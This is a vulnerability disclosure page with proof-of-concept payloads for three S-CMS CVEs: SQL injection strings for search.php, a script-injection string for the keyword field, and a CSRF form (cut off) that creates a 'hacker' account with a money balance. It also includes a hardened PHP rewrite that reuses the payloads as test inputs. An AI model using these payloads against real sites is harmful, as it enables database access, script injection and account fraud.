The PoC of S-CMS (SQL injection) - CVE-2018-19331

Download page:

location: S-CMS/search.php line 155

Vulnerable code:  $sql="select * from SL_text where (T_title like '%".$keyword."%' or T_content like '%".$keyword."%' ) order by T_id desc";

%' AND 1=1 AND '%'='

%' AND 1=2 AND '%'='

An attacker can insert an SQL statement between the two "AND" operators to query the database.


The PoC of S-CMS (XSS) - CVE-2018-19145

Download page:

location: S-CMS/search.php line 144

Vulnerable code:  <input type="text" name="keyword" class="form-control" placeholder="<?php echo lang("输入关键词/l/Input your Keywords")?>" value="<?php echo $keyword?>">

Exp: "><script>(1)</script>
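
A hardened form of the two search.php lines quoted above (the query at line 155 and the value attribute at line 144), as an added example that is not S-CMS's own code: the keyword is bound as a parameter instead of being concatenated into the LIKE clause, and it is HTML-encoded before being echoed. The PDO connection, the helper names like_escape(), search_texts() and attr(), and the in-memory SQLite demo rows are assumptions; the table and column names are the ones in the quoted query.

```php
<?php
// Added example, not S-CMS code. Assumed: a PDO connection, the helper
// names below, and an in-memory SQLite table standing in for SL_text.
declare(strict_types=1);

/** Escape LIKE wildcards so the keyword only ever matches literally. */
function like_escape(string $s): string
{
    // '!' is the escape character named in the ESCAPE clause below.
    return strtr($s, ['!' => '!!', '%' => '!%', '_' => '!_']);
}

/** Parameterized replacement for the concatenated query at line 155. */
function search_texts(PDO $pdo, string $keyword): array
{
    $pattern = '%' . like_escape($keyword) . '%';
    $stmt = $pdo->prepare(
        "SELECT * FROM SL_text
          WHERE (T_title LIKE :kw1 ESCAPE '!' OR T_content LIKE :kw2 ESCAPE '!')
          ORDER BY T_id DESC"
    );
    // The keyword travels as data; it never becomes part of the SQL text.
    $stmt->execute([':kw1' => $pattern, ':kw2' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** Encoding for values echoed into an HTML attribute (line 144). */
function attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed demo data (requires the pdo_sqlite extension).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE SL_text (T_id INTEGER PRIMARY KEY, T_title TEXT, T_content TEXT)");
$pdo->exec("INSERT INTO SL_text (T_title, T_content) VALUES ('News', 'hello'), ('Sale', '50% off')");

// Regression inputs: a literal search plus the two strings shown on this page.
foreach (['50%', "%' AND 1=1 AND '%'='", '"><script>(1)</script>'] as $keyword) {
    $rows = search_texts($pdo, $keyword);
    printf("keyword=%s rows=%d\n", attr($keyword), count($rows));
    echo '<input type="text" name="keyword" value="' . attr($keyword) . "\">\n";
}
```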

The PoC of S-CMS (CSRF) - CVE-2018-19332

Download page:

<!DOCTYPE html>
    <meta http-equiv="Content-Type" content="text/html" charset="utf-8" />
<center><h1>fake request</h1></center>
    <form action="" name="form" method="post" role="form">
    <input type="hidden" name="M_login" value="hacker">
    <input type="hidden" name="M_pwd" value="hacker">
    <input type="hidden" name="M_money" value="10000">
    <input type="hidden" name="M_fen" value="0">
    <input type="hidden" name="M_name" value="1">
    <input type="hidden…